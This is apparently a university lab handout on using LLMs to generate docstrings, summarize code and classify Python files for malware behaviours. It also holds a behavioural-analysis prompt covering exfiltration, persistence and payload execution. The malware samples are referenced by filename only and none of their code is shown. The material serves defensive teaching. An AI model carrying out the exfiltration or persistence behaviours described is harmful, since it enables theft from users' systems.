08.1: Code Documentation and Analysis

Using an LLM such as ChatGPT, Gemini , or Copilot to aid in documenting, summarizing, classifying, analyzing, and reverse-engineering code, can save a developer and an analyst a substantial amount of time and effort. However, to leverage this capability, one must be able to understand what tasks the models are reliably capable of doing to prevent errors. In this lab, you will utilize LLMs to analyze different code examples and determine whether the result is accurate. To begin with, change into the code directory for the exercises and install the packages.

cd cs475-src
git pull
cd 08*
uv init --python 3.13 --bare
uv add -r requirements.txt

Code summarization is often done by humans in order to generate documentation that can be used to allow others to understand code. One of the more reliable uses for LLMs is to produce such documentation. In Python, docstrings are used to provide this information. Consider the code below that reverses a string, but does not have any documentation associated with it.

def string_reverse(str1):
    reverse_str1 = ''
    i = len(str1)
    while i > 0:
        reverse_str1 += str1[i - 1]
        i = i- 1
    return reverse_str1

The documentation for this function can be provided in a number of formats. It's a labor-intensive and error-prone task for a developer to craft appropriate documentation in a particular formatting convention. Use an LLM to automatically generate the documentation of the above function in the sphinx format.

Take a screenshot of the result that includes your OdinId

Repeat the generation using the numpy format for the code below:

def connect(url, username, password):
    try:
        response = requests.get(url, auth=(username, password))
        response.raise_for_status()
        return response.text
    except requests.RequestException as e:
        print(f"Error: {e}\nThis site cannot be reached")
        sys.exit(1)

Take a screenshot of the result that includes your OdinId

When summarizing code, we can programmatically parse the program based on the language it is written in before sending it to an LLM for analysis. Within the directory, there's a Python parsing program that uses the GenericLoader document loader and LanguageParser parser to implement a Python code summarizer.

def summarize(path):
    loader = GenericLoader.from_filesystem(
            path,
            glob="*",
            suffixes=[".py"],
            parser=LanguageParser(language="python"),
    )
    docs = loader.load()
    prompt1 = PromptTemplate.from_template("Summarize this Python code: {text}")

    chain = (
      {"text": RunnablePassthrough()}
      | prompt1
      | llm
      | StrOutputParser()
    )
    output = "\n".join([d.page_content for d in docs])
    result = chain.invoke(output)

src/p0.py

View the source file in the src directory to get an understanding of what it does.

Find the two main operations that the code performs

Run the program in the repository below:

uv run 01_code_summarize.py

Within the program's interactive shell, have the program summarize the file.

src/p0.py

Take a screenshot of the summary showing the operations that includes your OdinId

Understanding unknown code is a task one might give an LLM, especially if the amount of code fits within the context window of a model. For example, one might use an LLM to determine whether or not code that has been downloaded from the Internet is malicious or not. Such an approach might be used to detect and prevent execution of malware that hijacks resources on a computer system, performs ransomware, or sets up a backdoor.

src/p1.py

Examine the code for the program.

Find the mechanisms it uses to maintain persistence and steal information.

Then, use the prior program to summarize the code.

Take a screenshot of the summary describing the two mechanisms that includes your OdinId

src/p2.py

Examine the code for the program.

What is the purpose of the code?

Then, use the prior program to summarize the code.

Take a screenshot of the summary correctly identifying the purpose of the code that includes your OdinId

src/p3.py

Examine the code for the program.

What command does the program respond to?

Then, use the prior program to summarize the code.

Take a screenshot of the summary correctly identifying the command the code responds to that includes your OdinId

src/p4.py

Examine the code for the program.

Find the types of data it accesses and the mechanism used for exfiltration

Then, use the prior program to summarize the code.

Take a screenshot of the summary correctly identifying the types of data and the exfiltration method that includes your OdinId

src/p5.py

Examine the code for the program taken from an article on LLM-assisted malware analysis of Python packages. Its original source can be found here.

Find what files it accesses and how it obtains its exfiltration destination

Then, use the prior program to summarize the code.

Take a screenshot of the summary correctly identifying the types of data and the mechanism used to obtain its exfiltration destination that includes your OdinId

src/p6.py

Another example from the article is also included. Its original source can be found here.

Find the function of the program and the types of payloads it can execute

Then, use the prior program to summarize the code.

Take a screenshot of the summary correctly identifying the purpose of the program and the payload types it supports that includes your OdinId

Classifying unknown code is a task one might give an LLM as well. Similar to the prior exercise, we can configure a prompt to have an LLM analyze whether or not code performs specific operations that might be indicative of malware such as:

Data exfiltration
File creation
Process launching
Environment variable access

We can slightly modify our prior code to ask an LLM to evaluate whether a particular program performs each operation. This is done via a prompt shown below:

You are an advanced security analyst. Your task is to perform a behavioral analysis looking for specific behaviors such as:
  - **Data exfiltration**: Detect if data is sent off-machine or communicates with external IPs or servers.
  - **File creation**: Identify instances where files are created, deleted, or modified in the file system.
  - **Process launching**: Detect if new processes are launched or system commands are executed.
  - **Environment variable access**: Determine if environment variables are read or modified.

LLMs are good at returning output that matches a given format. For this exercise, we can specify the results be returned in JSON via the prompt as well:

For each behavior detected, provide supporting evidence and assign a confidence score (0 to 1).

Respond in JSON format with the following structure:
  {{
    "behavior_analysis": [
        {{ "data_exfiltration": {{ "detected": true/false, "confidence": 0-1, "evidence": "description of findings", "code_snippet": "snippet of code" }} }},
        {{ "file_creation": {{ "detected": true/false, "confidence": 0-1, "evidence": "description of findings", "code_snippet": "snippet of code" }} }},
        ...
  }}

src/p0.py

Run the program in the repository below to perform program classifications.

uv run 02_code_classify.py

Within the program's interactive shell, have the program classify the file. For each classification category that is marked as 'true'

Create a table of the code_snippet returned for each that the LLM identifies as evidence